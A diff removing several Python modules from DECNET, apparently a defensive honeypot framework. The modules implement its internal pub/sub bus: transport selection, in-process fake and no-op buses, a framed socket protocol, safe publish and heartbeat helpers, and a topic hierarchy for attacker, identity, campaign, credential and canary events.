_CLOSE_SENTINEL: Any = object()
|
||||
|
||||
|
||||
async def _next_or_stop(queue: "asyncio.Queue[Any]") -> Event:
|
||||
"""Pop the next item from *queue*, raising ``StopAsyncIteration`` on close."""
|
||||
item = await queue.get()
|
||||
if item is _CLOSE_SENTINEL:
|
||||
raise StopAsyncIteration
|
||||
return item
|
||||
@@ -1,85 +0,0 @@
|
||||
"""Bus factory — selects a :class:`~decnet.bus.base.BaseBus` implementation.
|
||||
|
||||
Dispatch key: the ``DECNET_BUS_TYPE`` environment variable.
|
||||
|
||||
* ``unix`` (default) → :class:`~decnet.bus.unix_client.UnixSocketBus`
|
||||
* ``fake`` → :class:`~decnet.bus.fake.FakeBus` (in-process)
|
||||
|
||||
If ``DECNET_BUS_ENABLED`` is ``"false"`` the factory short-circuits to
|
||||
:class:`~decnet.bus.fake.NullBus` regardless of ``DECNET_BUS_TYPE`` — a
|
||||
cheap way for dev environments to run workers without a bus daemon.
|
||||
|
||||
Mirrors :mod:`decnet.web.db.factory` (lazy imports inside each branch,
|
||||
env-driven dispatch, optional telemetry wrapping). Callers MUST use
|
||||
:func:`get_bus` rather than instantiating transports directly.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus.base import BaseBus
|
||||
|
||||
|
||||
def get_bus(**kwargs: Any) -> BaseBus:
|
||||
"""Instantiate the bus implementation selected by environment.
|
||||
|
||||
Keyword arguments are forwarded to the concrete transport:
|
||||
|
||||
* ``UnixSocketBus`` accepts ``socket_path`` (overrides
|
||||
``DECNET_BUS_SOCKET``) and ``client_name``.
|
||||
* ``FakeBus`` accepts ``queue_size``.
|
||||
"""
|
||||
if os.environ.get("DECNET_BUS_ENABLED", "true").lower() == "false":
|
||||
from decnet.bus.fake import NullBus
|
||||
return NullBus()
|
||||
|
||||
bus_type = os.environ.get("DECNET_BUS_TYPE", "unix").lower()
|
||||
|
||||
if bus_type == "unix":
|
||||
from decnet.bus.unix_client import UnixSocketBus
|
||||
socket_path = kwargs.pop("socket_path", None) or _default_socket_path()
|
||||
bus: BaseBus = UnixSocketBus(socket_path=socket_path, **kwargs)
|
||||
elif bus_type == "fake":
|
||||
from decnet.bus.fake import FakeBus
|
||||
bus = FakeBus(**kwargs)
|
||||
else:
|
||||
raise ValueError(f"Unsupported bus type: {bus_type}")
|
||||
|
||||
return _maybe_wrap_telemetry(bus)
|
||||
|
||||
|
||||
def _default_socket_path() -> str:
|
||||
"""Return the bus socket path honoring ``DECNET_BUS_SOCKET`` and falling
|
||||
back to ``/run/decnet/bus.sock`` → ``~/.decnet/bus.sock``.
|
||||
|
||||
The runtime path (``/run/decnet``) is preferred because systemd
|
||||
``RuntimeDirectory=decnet`` sets it up with the right perms; the home
|
||||
fallback keeps dev boxes usable without systemd.
|
||||
"""
|
||||
explicit = os.environ.get("DECNET_BUS_SOCKET")
|
||||
if explicit:
|
||||
return explicit
|
||||
|
||||
runtime_dir = "/run/decnet"
|
||||
if os.path.isdir(runtime_dir) and os.access(runtime_dir, os.W_OK):
|
||||
return f"{runtime_dir}/bus.sock"
|
||||
return os.path.expanduser("~/.decnet/bus.sock")
|
||||
|
||||
|
||||
def _maybe_wrap_telemetry(bus: BaseBus) -> BaseBus:
|
||||
"""Wrap *bus* in a tracing proxy if OTEL is enabled, else return as-is.
|
||||
|
||||
Uses :func:`decnet.telemetry.wrap_repository` as the underlying proxy —
|
||||
its implementation is generic (wraps any async method in a span), so we
|
||||
reuse it with a bus-appropriate tracer name. If telemetry isn't wired
|
||||
up at all we no-op.
|
||||
"""
|
||||
try:
|
||||
from decnet.telemetry import wrap_repository # type: ignore[attr-defined]
|
||||
except ImportError:
|
||||
return bus
|
||||
try:
|
||||
return wrap_repository(bus)
|
||||
except Exception: # pragma: no cover - defensive
|
||||
return bus
|
||||
@@ -1,183 +0,0 @@
|
||||
"""In-process bus transports.
|
||||
|
||||
* :class:`FakeBus` — real pub/sub semantics without touching a socket. Used
|
||||
by unit tests and anywhere ``DECNET_BUS_TYPE=fake`` is set. Lets code
|
||||
that depends on the bus be exercised entirely inside a single event loop,
|
||||
matching the DECNET testing convention of not opening real network
|
||||
sockets from unit tests.
|
||||
* :class:`NullBus` — no-op. Returned by :func:`~decnet.bus.factory.get_bus`
|
||||
when ``DECNET_BUS_ENABLED=false`` so workers can start cleanly in dev
|
||||
environments where no bus daemon is running. Publishes are dropped;
|
||||
subscriptions yield nothing and close cleanly.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
from typing import Any
|
||||
|
||||
from decnet.bus.base import (
|
||||
BaseBus,
|
||||
Event,
|
||||
Subscription,
|
||||
_CLOSE_SENTINEL,
|
||||
matches,
|
||||
)
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.fake")
|
||||
|
||||
# Per-subscriber bounded queue: backpressure policy is drop-oldest so a slow
|
||||
# consumer cannot stall publishers (the invariant — DB is the source of
|
||||
# truth — makes dropped events acceptable).
|
||||
_DEFAULT_QUEUE_SIZE = 1024
|
||||
|
||||
|
||||
# ─── FakeBus ─────────────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class _FakeSubscription(Subscription):
|
||||
"""Subscription backed by an :class:`asyncio.Queue` fed from
|
||||
:meth:`FakeBus.publish`. Unregisters itself on close."""
|
||||
|
||||
def __init__(self, bus: "FakeBus", pattern: str, queue: "asyncio.Queue[Any]") -> None:
|
||||
super().__init__(pattern)
|
||||
self._bus = bus
|
||||
self._queue = queue
|
||||
|
||||
async def __anext__(self) -> Event:
|
||||
if self._closed:
|
||||
raise StopAsyncIteration
|
||||
item = await self._queue.get()
|
||||
if item is _CLOSE_SENTINEL:
|
||||
raise StopAsyncIteration
|
||||
return item
|
||||
|
||||
async def _aclose(self) -> None:
|
||||
self._bus._unregister(self)
|
||||
# Unblock any pending __anext__ waiter.
|
||||
try:
|
||||
self._queue.put_nowait(_CLOSE_SENTINEL)
|
||||
except asyncio.QueueFull:
|
||||
pass
|
||||
|
||||
|
||||
class FakeBus(BaseBus):
|
||||
"""In-process pub/sub.
|
||||
|
||||
Publishes iterate every active subscription and enqueue the event on
|
||||
the ones whose pattern matches the topic. If a subscriber's queue is
|
||||
full, the oldest event is discarded to make room — same at-most-once
|
||||
semantics as the real UNIX-socket transport.
|
||||
"""
|
||||
|
||||
def __init__(self, queue_size: int = _DEFAULT_QUEUE_SIZE) -> None:
|
||||
self._queue_size = queue_size
|
||||
self._subs: list[_FakeSubscription] = []
|
||||
self._connected = False
|
||||
self._closed = False
|
||||
self._lock = asyncio.Lock()
|
||||
|
||||
async def connect(self) -> None:
|
||||
self._connected = True
|
||||
|
||||
async def publish(
|
||||
self,
|
||||
topic: str,
|
||||
payload: dict[str, Any],
|
||||
*,
|
||||
event_type: str = "",
|
||||
) -> None:
|
||||
if self._closed:
|
||||
raise RuntimeError("publish on closed bus")
|
||||
event = Event(topic=topic, payload=payload, type=event_type)
|
||||
async with self._lock:
|
||||
targets = [s for s in self._subs if matches(s.pattern, topic)]
|
||||
for sub in targets:
|
||||
_enqueue_drop_oldest(sub._queue, event)
|
||||
|
||||
def subscribe(self, pattern: str) -> Subscription:
|
||||
if self._closed:
|
||||
raise RuntimeError("subscribe on closed bus")
|
||||
queue: asyncio.Queue[Any] = asyncio.Queue(maxsize=self._queue_size)
|
||||
sub = _FakeSubscription(self, pattern, queue)
|
||||
self._subs.append(sub)
|
||||
return sub
|
||||
|
||||
def _unregister(self, sub: _FakeSubscription) -> None:
|
||||
try:
|
||||
self._subs.remove(sub)
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
async def close(self) -> None:
|
||||
if self._closed:
|
||||
return
|
||||
self._closed = True
|
||||
# Wake every still-open subscription so iterators unblock cleanly.
|
||||
for sub in list(self._subs):
|
||||
try:
|
||||
sub._queue.put_nowait(_CLOSE_SENTINEL)
|
||||
except asyncio.QueueFull:
|
||||
pass
|
||||
self._subs.clear()
|
||||
|
||||
|
||||
def _enqueue_drop_oldest(queue: "asyncio.Queue[Any]", event: Event) -> None:
|
||||
"""Put *event* on *queue*, dropping the oldest item if the queue is full.
|
||||
|
||||
Factored out so both FakeBus and the real UNIX server share the exact
|
||||
same backpressure policy.
|
||||
"""
|
||||
while True:
|
||||
try:
|
||||
queue.put_nowait(event)
|
||||
return
|
||||
except asyncio.QueueFull:
|
||||
try:
|
||||
dropped = queue.get_nowait()
|
||||
log.warning(
|
||||
"bus.fake: subscriber queue full, dropped %s", getattr(dropped, "topic", "?")
|
||||
)
|
||||
except asyncio.QueueEmpty:
|
||||
return
|
||||
|
||||
|
||||
# ─── NullBus ─────────────────────────────────────────────────────────────────
|
||||
|
||||
|
||||
class _NullSubscription(Subscription):
|
||||
"""A subscription that never yields and closes immediately on iteration."""
|
||||
|
||||
async def __anext__(self) -> Event:
|
||||
raise StopAsyncIteration
|
||||
|
||||
async def _aclose(self) -> None:
|
||||
return
|
||||
|
||||
|
||||
class NullBus(BaseBus):
|
||||
"""No-op bus used when ``DECNET_BUS_ENABLED=false``.
|
||||
|
||||
Publishes are silently dropped; subscriptions are empty. Intended for
|
||||
dev environments where no bus daemon is running — the process starts
|
||||
cleanly, code that publishes doesn't need feature flags, and nothing
|
||||
ever blocks on a subscriber.
|
||||
"""
|
||||
|
||||
async def connect(self) -> None:
|
||||
return
|
||||
|
||||
async def publish(
|
||||
self,
|
||||
topic: str,
|
||||
payload: dict[str, Any],
|
||||
*,
|
||||
event_type: str = "",
|
||||
) -> None:
|
||||
return
|
||||
|
||||
def subscribe(self, pattern: str) -> Subscription:
|
||||
return _NullSubscription(pattern)
|
||||
|
||||
async def close(self) -> None:
|
||||
return
|
||||
@@ -1,144 +0,0 @@
|
||||
"""Wire protocol for the DECNET bus UNIX-socket transport.
|
||||
|
||||
Frame layout:
|
||||
|
||||
<VERB> [<args ...>]\\n # ASCII header, single line, no trailing space
|
||||
<4-byte big-endian body length>
|
||||
<body> # orjson-serialized dict, or empty (length 0)
|
||||
|
||||
Verbs:
|
||||
|
||||
* ``HELLO <client-name>`` — optional greeting, logged by server. Body empty.
|
||||
* ``PUB <topic>`` — publisher → server. Body = payload dict.
|
||||
* ``SUB <pattern>`` — subscriber → server. Body empty.
|
||||
* ``UNSUB <pattern>`` — subscriber → server. Body empty.
|
||||
* ``EVT <topic>`` — server → subscriber. Body = payload dict (wrapped
|
||||
in an :class:`~decnet.bus.base.Event` envelope).
|
||||
* ``BYE`` — either direction. Body empty. Graceful shutdown.
|
||||
|
||||
Parsing rules:
|
||||
|
||||
* The header is a single line terminated by ``\\n`` (LF). ``\\r`` is tolerated
|
||||
but not required.
|
||||
* Header tokens are whitespace-separated. The first token is the verb;
|
||||
everything after is verb-specific. We split on the first space only so
|
||||
topics / patterns with quoted content are not supported (they are not
|
||||
needed — topic segments forbid whitespace per :mod:`decnet.bus.topics`).
|
||||
* Maximum header length is 4096 bytes; maximum body length is 1 MiB. Beyond
|
||||
those, the connection is dropped with a logged error. This is a honeypot
|
||||
framework, not a general-purpose message broker; a malformed frame is
|
||||
treated as hostile.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import struct
|
||||
from dataclasses import dataclass
|
||||
from typing import Any
|
||||
|
||||
import orjson
|
||||
|
||||
MAX_HEADER_BYTES = 4096
|
||||
MAX_BODY_BYTES = 1 * 1024 * 1024 # 1 MiB
|
||||
|
||||
# Verb constants (callers should reference these, not bare strings).
|
||||
HELLO = "HELLO"
|
||||
PUB = "PUB"
|
||||
SUB = "SUB"
|
||||
UNSUB = "UNSUB"
|
||||
EVT = "EVT"
|
||||
BYE = "BYE"
|
||||
|
||||
_VALID_VERBS = frozenset({HELLO, PUB, SUB, UNSUB, EVT, BYE})
|
||||
|
||||
|
||||
class ProtocolError(Exception):
|
||||
"""Malformed or oversized frame. Callers should close the connection."""
|
||||
|
||||
|
||||
@dataclass(frozen=True)
|
||||
class Frame:
|
||||
"""A parsed frame. ``body`` is the raw (unparsed) body bytes — callers
|
||||
decide whether to orjson-decode it (the protocol does not know whether
|
||||
a given verb expects a dict body or an empty one).
|
||||
"""
|
||||
|
||||
verb: str
|
||||
args: str # everything after the verb on the header line, trimmed
|
||||
body: bytes
|
||||
|
||||
|
||||
def encode(verb: str, args: str = "", body: dict[str, Any] | None = None) -> bytes:
|
||||
"""Serialize a frame.
|
||||
|
||||
*body* is a dict that will be orjson-encoded, or ``None`` for an empty
|
||||
body. The header line is written verbatim — callers must supply args
|
||||
that are free of ``\\n``.
|
||||
"""
|
||||
if verb not in _VALID_VERBS:
|
||||
raise ProtocolError(f"unknown verb {verb!r}")
|
||||
if "\n" in args or "\r" in args:
|
||||
raise ProtocolError("args must not contain newline characters")
|
||||
|
||||
body_bytes = b"" if body is None else orjson.dumps(body)
|
||||
if len(body_bytes) > MAX_BODY_BYTES:
|
||||
raise ProtocolError(
|
||||
f"body {len(body_bytes)} bytes exceeds max {MAX_BODY_BYTES}"
|
||||
)
|
||||
|
||||
header = f"{verb} {args}".rstrip() + "\n"
|
||||
header_bytes = header.encode("ascii")
|
||||
if len(header_bytes) > MAX_HEADER_BYTES:
|
||||
raise ProtocolError(
|
||||
f"header {len(header_bytes)} bytes exceeds max {MAX_HEADER_BYTES}"
|
||||
)
|
||||
return header_bytes + struct.pack(">I", len(body_bytes)) + body_bytes
|
||||
|
||||
|
||||
async def read_frame(reader: asyncio.StreamReader) -> Frame | None:
|
||||
"""Read one frame from *reader*.
|
||||
|
||||
Returns ``None`` on clean EOF before a new frame starts. Raises
|
||||
:class:`ProtocolError` on malformed input (caller should close the
|
||||
connection).
|
||||
"""
|
||||
try:
|
||||
header = await reader.readuntil(b"\n")
|
||||
except asyncio.IncompleteReadError as exc:
|
||||
if not exc.partial:
|
||||
return None
|
||||
raise ProtocolError("connection closed mid-header") from exc
|
||||
except asyncio.LimitOverrunError as exc:
|
||||
raise ProtocolError("header exceeded buffer limit") from exc
|
||||
|
||||
if len(header) > MAX_HEADER_BYTES:
|
||||
raise ProtocolError(f"header {len(header)} bytes exceeds max")
|
||||
|
||||
line = header.rstrip(b"\r\n").decode("ascii", errors="strict")
|
||||
if not line:
|
||||
raise ProtocolError("empty header line")
|
||||
|
||||
verb, _, args = line.partition(" ")
|
||||
if verb not in _VALID_VERBS:
|
||||
raise ProtocolError(f"unknown verb {verb!r}")
|
||||
|
||||
length_bytes = await reader.readexactly(4)
|
||||
(body_len,) = struct.unpack(">I", length_bytes)
|
||||
if body_len > MAX_BODY_BYTES:
|
||||
raise ProtocolError(f"body length {body_len} exceeds max")
|
||||
|
||||
body = await reader.readexactly(body_len) if body_len else b""
|
||||
return Frame(verb=verb, args=args.strip(), body=body)
|
||||
|
||||
|
||||
def decode_body(body: bytes) -> dict[str, Any]:
|
||||
"""Decode a frame body as a JSON dict. Empty body → empty dict."""
|
||||
if not body:
|
||||
return {}
|
||||
try:
|
||||
obj = orjson.loads(body)
|
||||
except orjson.JSONDecodeError as exc:
|
||||
raise ProtocolError(f"body is not valid JSON: {exc}") from exc
|
||||
if not isinstance(obj, dict):
|
||||
raise ProtocolError(f"body must be a JSON object, got {type(obj).__name__}")
|
||||
return obj
|
||||
@@ -1,211 +0,0 @@
|
||||
"""Fire-and-forget publish helpers shared across every worker.
|
||||
|
||||
Lifted out of ``decnet/mutator/engine.py`` once a second caller showed up
|
||||
(DEBT-031). Keeping one implementation means the "never break the worker
|
||||
loop" guarantee is audited in exactly one place.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import os
|
||||
import signal
|
||||
import time
|
||||
from typing import Any, Callable
|
||||
|
||||
from decnet.bus import topics as _topics
|
||||
from decnet.bus.base import BaseBus
|
||||
from decnet.logging import get_logger
|
||||
|
||||
log = get_logger("bus.publish")
|
||||
|
||||
|
||||
async def publish_safely(
|
||||
bus: BaseBus | None,
|
||||
topic: str,
|
||||
payload: dict[str, Any],
|
||||
event_type: str = "",
|
||||
) -> None:
|
||||
"""Publish on *bus* without ever raising back at the caller.
|
||||
|
||||
The DB row (or equivalent side-effect) has already been committed by
|
||||
the time a worker calls this; the bus is the notification layer, not
|
||||
the source of truth. A dropped publish is at most a few seconds of
|
||||
UI latency until the next poll tick. A raised exception here, by
|
||||
contrast, would crash the worker — which is strictly worse.
|
||||
"""
|
||||
if bus is None:
|
||||
return
|
||||
try:
|
||||
await bus.publish(topic, payload, event_type=event_type)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning("bus publish failed topic=%s: %s", topic, exc)
|
||||
|
||||
|
||||
def make_thread_safe_publisher(
|
||||
bus: BaseBus | None,
|
||||
loop: asyncio.AbstractEventLoop,
|
||||
) -> Callable[[str, dict[str, Any], str], None]:
|
||||
"""Build a sync callable that marshals publishes back to *loop*.
|
||||
|
||||
Workers that run their hot paths in a worker thread (scapy sniff loop,
|
||||
``asyncio.to_thread`` probes, blocking socket reads) cannot ``await``
|
||||
the bus directly. This helper returns a plain function that schedules
|
||||
the publish on *loop* via ``run_coroutine_threadsafe`` and returns
|
||||
immediately — the calling thread is never blocked on the publish.
|
||||
|
||||
A ``None`` bus yields a no-op callable, matching the degraded-mode
|
||||
contract the rest of this module already upholds.
|
||||
"""
|
||||
if bus is None:
|
||||
return lambda _topic, _payload, _event_type="": None
|
||||
|
||||
def _publish(topic: str, payload: dict[str, Any], event_type: str = "") -> None:
|
||||
# Stream threads may keep draining after the bus owner closed it
|
||||
# (shutdown race). Short-circuit here so we don't marshal a
|
||||
# coroutine onto a dead loop just to have publish_safely swallow
|
||||
# it. bus.publish's own WARN-once guard handles the rare case
|
||||
# where _closed flips between this check and the coroutine
|
||||
# actually running.
|
||||
if getattr(bus, "_closed", False):
|
||||
return
|
||||
try:
|
||||
asyncio.run_coroutine_threadsafe(
|
||||
publish_safely(bus, topic, payload, event_type=event_type),
|
||||
loop,
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.debug("cross-thread bus publish failed topic=%s: %s", topic, exc)
|
||||
|
||||
return _publish
|
||||
|
||||
|
||||
async def run_health_heartbeat(
|
||||
bus: BaseBus | None,
|
||||
worker: str,
|
||||
*,
|
||||
interval: float = 30.0,
|
||||
extra: Callable[[], dict[str, Any]] | None = None,
|
||||
) -> None:
|
||||
"""Publish ``system.<worker>.health`` every *interval* seconds.
|
||||
|
||||
Standard heartbeat loop shared across agent/forwarder/updater. Emits
|
||||
``{"worker": <name>, "ts": <unix-ts>, **extra()}`` on each tick. A
|
||||
``None`` bus turns the loop into a no-op sleep cycle — still cancellable
|
||||
so the caller can use the same ``asyncio.create_task``/``.cancel()``
|
||||
pattern regardless of bus state.
|
||||
|
||||
Cancellation-safe: unwraps the ``CancelledError`` so callers awaiting
|
||||
the task during shutdown see a clean exit.
|
||||
"""
|
||||
topic = _topics.system_health(worker)
|
||||
with contextlib.suppress(asyncio.CancelledError):
|
||||
while True:
|
||||
payload: dict[str, Any] = {"worker": worker, "ts": time.time()}
|
||||
if extra is not None:
|
||||
try:
|
||||
payload.update(extra())
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.debug("heartbeat extra() failed worker=%s: %s", worker, exc)
|
||||
await publish_safely(bus, topic, payload, event_type=_topics.SYSTEM_HEALTH)
|
||||
await asyncio.sleep(interval)
|
||||
|
||||
|
||||
async def run_control_listener(
|
||||
bus: BaseBus | None,
|
||||
worker: str,
|
||||
shutdown: asyncio.Event,
|
||||
) -> None:
|
||||
"""Subscribe to ``system.<worker>.control`` and honour stop intents.
|
||||
|
||||
On a well-formed ``{"action": "stop", ...}`` message the function sets
|
||||
*shutdown* and returns — the worker's main loop is expected to check
|
||||
the event and unwind cleanly, matching the SIGTERM path.
|
||||
|
||||
Malformed payloads (missing/unknown action, non-dict, exception from
|
||||
the transport) are logged and ignored. A ``None`` bus yields a noop
|
||||
coroutine that simply awaits *shutdown* — callers can ``create_task``
|
||||
this unconditionally regardless of bus state.
|
||||
|
||||
Cancellation-safe.
|
||||
"""
|
||||
if bus is None:
|
||||
with contextlib.suppress(asyncio.CancelledError):
|
||||
await shutdown.wait()
|
||||
return
|
||||
|
||||
topic = _topics.system_control(worker)
|
||||
with contextlib.suppress(asyncio.CancelledError):
|
||||
try:
|
||||
async with bus.subscribe(topic) as sub:
|
||||
async for event in sub:
|
||||
payload = event.payload or {}
|
||||
action = payload.get("action")
|
||||
requested_by = payload.get("requested_by", "<unknown>")
|
||||
if action == _topics.WORKER_CONTROL_STOP:
|
||||
log.info(
|
||||
"control: stop requested worker=%s by=%s",
|
||||
worker, requested_by,
|
||||
)
|
||||
shutdown.set()
|
||||
return
|
||||
log.debug(
|
||||
"control: ignoring unknown action worker=%s action=%r",
|
||||
worker, action,
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"control listener failed worker=%s: %s — shutdown via bus disabled",
|
||||
worker, exc,
|
||||
)
|
||||
|
||||
|
||||
async def run_control_listener_signal(
|
||||
bus: BaseBus | None,
|
||||
worker: str,
|
||||
) -> None:
|
||||
"""Like :func:`run_control_listener` but signals the process on stop.
|
||||
|
||||
Preferred for workers whose main loop is a blocking thread
|
||||
(container-log tail, PTY read, scapy sniff) — wiring an
|
||||
``asyncio.Event`` through the thread boundary is error-prone, and
|
||||
every DECNET worker already has systemd-equivalent SIGTERM cleanup.
|
||||
A SIGTERM self-signal routes the stop through that same path
|
||||
without inventing a second shutdown mechanism.
|
||||
|
||||
Cancellation-safe. Never raises: a failed self-signal is logged
|
||||
and the loop simply exits (admin can fall back to ``systemctl``).
|
||||
"""
|
||||
if bus is None:
|
||||
return
|
||||
|
||||
topic = _topics.system_control(worker)
|
||||
with contextlib.suppress(asyncio.CancelledError):
|
||||
try:
|
||||
async with bus.subscribe(topic) as sub:
|
||||
async for event in sub:
|
||||
payload = event.payload or {}
|
||||
action = payload.get("action")
|
||||
requested_by = payload.get("requested_by", "<unknown>")
|
||||
if action == _topics.WORKER_CONTROL_STOP:
|
||||
log.info(
|
||||
"control: stop requested worker=%s by=%s → SIGTERM self",
|
||||
worker, requested_by,
|
||||
)
|
||||
try:
|
||||
os.kill(os.getpid(), signal.SIGTERM)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"control: self-signal failed worker=%s: %s",
|
||||
worker, exc,
|
||||
)
|
||||
return
|
||||
log.debug(
|
||||
"control: ignoring unknown action worker=%s action=%r",
|
||||
worker, action,
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"control signal listener failed worker=%s: %s",
|
||||
worker, exc,
|
||||
)
|
||||
@@ -1,398 +0,0 @@
|
||||
"""Canonical topic hierarchy for the DECNET ServiceBus.
|
||||
|
||||
Locked early so consumers can subscribe with stable wildcard patterns.
|
||||
Adding new topic families is fine; **renaming** existing ones is a breaking
|
||||
change for every subscriber and requires a coordinated rollout.
|
||||
|
||||
Token structure (NATS-style, dot-separated):
|
||||
|
||||
topology.{topology_id}.mutation.{state}
|
||||
topology.{topology_id}.status
|
||||
decky.{decky_id}.state
|
||||
decky.{decky_id}.traffic
|
||||
orchestrator.traffic.{decky_id}
|
||||
orchestrator.file.{decky_id}
|
||||
orchestrator.email.{decky_id}
|
||||
attacker.observed
|
||||
attacker.scored
|
||||
attacker.session.started
|
||||
attacker.session.ended
|
||||
identity.formed
|
||||
identity.observation.linked
|
||||
identity.merged
|
||||
identity.unmerged
|
||||
identity.campaign.assigned
|
||||
campaign.formed
|
||||
campaign.identity.assigned
|
||||
campaign.merged
|
||||
campaign.unmerged
|
||||
credential.captured
|
||||
credential.reuse.detected
|
||||
canary.{token_id}.triggered
|
||||
canary.{token_id}.placed
|
||||
canary.{token_id}.revoked
|
||||
system.log
|
||||
system.bus.health
|
||||
system.{worker}.health
|
||||
|
||||
Wildcards (per :func:`decnet.bus.base.matches`):
|
||||
|
||||
* ``*`` matches exactly one token.
|
||||
* ``>`` matches one-or-more trailing tokens (so ``topology.>`` matches
|
||||
``topology.abc.status`` but not the bare root ``topology``).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
# ─── Root prefixes ───────────────────────────────────────────────────────────
|
||||
|
||||
TOPOLOGY = "topology"
|
||||
DECKY = "decky"
|
||||
ATTACKER = "attacker"
|
||||
IDENTITY = "identity"
|
||||
CAMPAIGN = "campaign"
|
||||
SYSTEM = "system"
|
||||
CREDENTIAL = "credential"
|
||||
ORCHESTRATOR = "orchestrator"
|
||||
CANARY = "canary"
|
||||
|
||||
|
||||
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
|
||||
|
||||
# Topology mutation lifecycle states — keep in sync with TopologyMutation.state
|
||||
# in decnet/web/db/models.py; the bus topic mirrors the DB state machine.
|
||||
MUTATION_ENQUEUED = "enqueued"
|
||||
MUTATION_APPLYING = "applying"
|
||||
MUTATION_APPLIED = "applied"
|
||||
MUTATION_FAILED = "failed"
|
||||
|
||||
# Topology-level status transitions (topology.{id}.status): fires when the
|
||||
# topology row's status column changes (pending/deploying/active/degraded/failed).
|
||||
TOPOLOGY_STATUS = "status"
|
||||
|
||||
# Decky-level event types (second token).
|
||||
DECKY_STATE = "state"
|
||||
DECKY_TRAFFIC = "traffic"
|
||||
# On-demand mutation request — published by the API/CLI/UI, consumed by
|
||||
# the mutator's watch loop to force an immediate mutation of one decky
|
||||
# without waiting for its scheduled interval. Underscored (not dotted)
|
||||
# to stay a single NATS token so the builder's validator accepts it.
|
||||
DECKY_MUTATE_REQUEST = "mutate_request"
|
||||
# Mutation transition event — distinct from DECKY_STATE ("current
|
||||
# shape") because a mutation is a *transition* that carries old/new
|
||||
# services + trigger + timing. Correlator consumes these (via the
|
||||
# syslog sidechannel too) to interleave substrate-change markers into
|
||||
# attacker traversals.
|
||||
DECKY_MUTATION = "mutation"
|
||||
|
||||
# Attacker event types (second token under the ``attacker`` root). First
|
||||
# sighting, session boundary transitions, and score-threshold crossings
|
||||
# published by correlator + profiler. Consumers typically subscribe to
|
||||
# the wildcard ``attacker.>``.
|
||||
ATTACKER_OBSERVED = "observed"
|
||||
ATTACKER_SCORED = "scored"
|
||||
# Published once per successful active probe result (JARM/HASSH/TCPfp).
|
||||
# Distinct from ``observed`` which is the correlator's first-sight signal —
|
||||
# a fingerprint is additional evidence about an already-observed attacker.
|
||||
ATTACKER_FINGERPRINTED = "fingerprinted"
|
||||
ATTACKER_SESSION_STARTED = "session.started"
|
||||
ATTACKER_SESSION_ENDED = "session.ended"
|
||||
# Published by the ``decnet enrich`` worker after an enrichment pass
|
||||
# succeeds for an attacker IP (one or more 3rd-party intel providers
|
||||
# returned a verdict). Payload carries the aggregate verdict + per-
|
||||
# provider summary so SIEM-bound webhooks don't need to re-query the DB.
|
||||
ATTACKER_INTEL_ENRICHED = "intel.enriched"
|
||||
|
||||
# Identity-resolution event types (second/third tokens under ``identity``).
|
||||
# Published by the (future) clusterer worker — see
|
||||
# development/IDENTITY_RESOLUTION.md. Constants ship in this commit;
|
||||
# no publishers exist yet, but consumers (webhook worker, dashboard
|
||||
# SSE relay) can subscribe to ``identity.>`` from day one and receive
|
||||
# events the instant the clusterer comes online.
|
||||
#
|
||||
# identity.formed — clusterer creates a new identity from
|
||||
# one or more observations
|
||||
# identity.observation.linked — observation attached to an existing
|
||||
# identity (or reattached from another)
|
||||
# identity.merged — two identities collapsed; loser gets
|
||||
# ``merged_into_uuid`` set, subscribers
|
||||
# re-key cached references to the winner
|
||||
# identity.unmerged — revocable-merge undo: contradicting
|
||||
# evidence cleared ``merged_into_uuid``
|
||||
# and re-split observations. The
|
||||
# resurrected side's UUID is the same
|
||||
# as the prior loser, so subscribers
|
||||
# that cached references to the loser
|
||||
# during the merged interval can
|
||||
# re-attach without a new lookup.
|
||||
#
|
||||
# ``identity.campaign.assigned`` is deferred; it ships when the campaign
|
||||
# clusterer ships. YAGNI before then.
|
||||
IDENTITY_FORMED = "formed"
|
||||
IDENTITY_OBSERVATION_LINKED = "observation.linked"
|
||||
IDENTITY_MERGED = "merged"
|
||||
IDENTITY_UNMERGED = "unmerged"
|
||||
# Campaign-clusterer cross-family event — fires under ``identity.>`` so
|
||||
# identity-stream subscribers (e.g. the IdentityDetail SSE client) get
|
||||
# notified the moment an identity's ``campaign_id`` changes without
|
||||
# having to subscribe to the campaign topic family. The same event
|
||||
# fires under ``campaign.identity.assigned`` for campaign-side
|
||||
# subscribers.
|
||||
IDENTITY_CAMPAIGN_ASSIGNED = "campaign.assigned"
|
||||
|
||||
# Campaign-clusterer event types (second/third tokens under
|
||||
# ``campaign``). Mirror of the identity family at the layer above:
|
||||
# campaigns group identities into operations, and the clusterer
|
||||
# publishes the same form / link / merge / unmerge lifecycle.
|
||||
#
|
||||
# campaign.formed — clusterer creates a new campaign from
|
||||
# one or more identities
|
||||
# campaign.identity.assigned — identity attached to an existing
|
||||
# campaign (or reassigned from another)
|
||||
# campaign.merged — two campaigns collapsed; loser gets
|
||||
# ``merged_into_uuid`` set, subscribers
|
||||
# re-key cached references to the winner
|
||||
# campaign.unmerged — revocable-merge undo: contradicting
|
||||
# evidence cleared ``merged_into_uuid``
|
||||
# and re-split identities
|
||||
CAMPAIGN_FORMED = "formed"
|
||||
CAMPAIGN_IDENTITY_ASSIGNED = "identity.assigned"
|
||||
CAMPAIGN_MERGED = "merged"
|
||||
CAMPAIGN_UNMERGED = "unmerged"
|
||||
|
||||
# Credential event types (second/third tokens under ``credential``).
|
||||
# ``credential.captured`` fires once per upserted Credential row — the
|
||||
# correlator listens for it and runs the cred-reuse query in response,
|
||||
# so reuse detection latency is sub-second after a fresh capture.
|
||||
